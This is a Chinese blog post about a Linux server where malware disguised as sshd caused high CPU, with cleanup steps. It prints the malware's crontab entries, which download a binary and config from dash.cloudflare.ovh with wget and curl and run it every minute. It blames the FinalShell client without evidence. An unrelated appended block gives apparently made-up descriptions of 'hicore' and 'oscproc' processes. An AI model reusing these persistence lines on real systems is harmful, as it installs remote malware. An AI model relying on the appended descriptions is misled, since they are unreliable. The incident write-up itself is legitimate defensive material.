sshd占用cpu过高

中病毒了,重装机器吧,不要使用**FinalShell**链接服务器

记录下我这里出现的原因
FinalShell 链接机器后从左侧的cpu占用图看到的,我进入机器执行命令确实如下;
但是用finalShell链接我阿里云/腾讯服务器没有出现,可能是其他服务器的防火墙比较完善;

top查看cpu占用

在这里插入图片描述

解决

找到恶意程序的绝对路径

ll /proc/{pid}

在这里插入图片描述

删除恶意程序,kill进程

rm -rf /var/tmp/*
kill -9 {pid}

恶意程序过一段时间后, 还是会重新下载到/var/tmp目录, 并运行.发现有恶意的linux定时任务存在, 删除即可!

[root@vm-16-13-centos tmp]# crontab -l
*/5 * * * * flock -xn /tmp/stargate.lock -c '/usr/local/qcloud/stargate/admin/start.sh > /dev/null 2>&1 &'

0 */6 * * * /usr/bin/flock -n /var/tmp/tmp.lock -c 'cd /var/tmp; wget -nc http://dash.cloudflare.ovh/mvt/sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; curl http://dash.cloudflare.ovh/mvt/sshd -o sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; wget -nc http://dash.cloudflare.ovh/mvt/config.json; cd /var/tmp; curl http://dash.cloudflare.ovh/mvt/config.json -o config.json'
* * * * * /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; ./sshd'


[root@vm-16-13-centos tmp]# cat /etc/crontab 
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed

0 */6 * * * root /usr/bin/flock -n /var/tmp/tmp.lock -c 'cd /var/tmp; wget -nc http://dash.cloudflare.ovh/mvt/sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; curl http://dash.cloudflare.ovh/mvt/sshd -o sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; wget -nc http://dash.cloudflare.ovh/mvt/config.json; cd /var/tmp; curl http://dash.cloudflare.ovh/mvt/config.json -o config.json'
* * * * * root /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; ./sshd'

Linux Crontab 定时任务
/etc/crontab文件和crontab -e命令区别

原文链接 https://blog.csdn.net/liujinghu/article/details/125288926

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
1. hicore: hicore 是一个在性能计算节点上运行的进程,主要用于性能计算和科学计算任务。它通常用于执行大量的计算任务,需要大量的计算资源和速的网络连接。hicore 进程通常使用的是大页内存,可以有效地减少内存碎片和减少内存访问的开销。 使用说明: hicore 进程通常由专门的运维人员或者性能计算专家来管理和使用,在使用时需要注意以下几点: - 确保性能计算节点上的资源足够支持 hicore 进程的运行; - 需要使用专门的工具和算法来编写和运行 hicore 进程; - 确保 hicore 进程使用的内存分配和释放方式正确,不会导致内存泄漏或者内存错误。 2. sshd: sshd 是 Secure Shell Daemon 的缩写,是一种远程登录协议,它允许用户在不安全的网络中通过加密连接登录到远程计算机上,并且可以在远程计算机上执行命令和程序。sshd 进程通常会占用一定的内存和网络资源。 使用说明: sshd 进程通常是在服务器或者云计算环境下使用的,用于远程登录和管理服务器。在使用时需要注意以下几点: - 确保 sshd 进程的配置和安全设置正确,不会导致安全漏洞; - 确保 sshd 进程的网络连接稳定和可靠,不会出现网络中断或者连接超时的问题; - 确保 sshd 进程的权限和访问控制正确,不会导致未授权的访问或者权限不足的问题。 3. oscproc: oscproc 是操作系统进程的缩写,它是操作系统内部运行的进程,用于执行系统任务和管理系统资源。oscproc 进程通常会占用一定的内存和 CPU 资源。 使用说明: oscproc 进程通常由操作系统内部自动创建和管理,在使用时需要注意以下几点: - 避免修改或者删除系统进程,否则可能会导致系统崩溃或者无法启动; - 确保系统进程的权限和访问控制正确,不会导致未授权的访问或者权限不足的问题; - 在使用系统进程时需要谨慎,避免对系统的稳定性和安全性造成影响。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值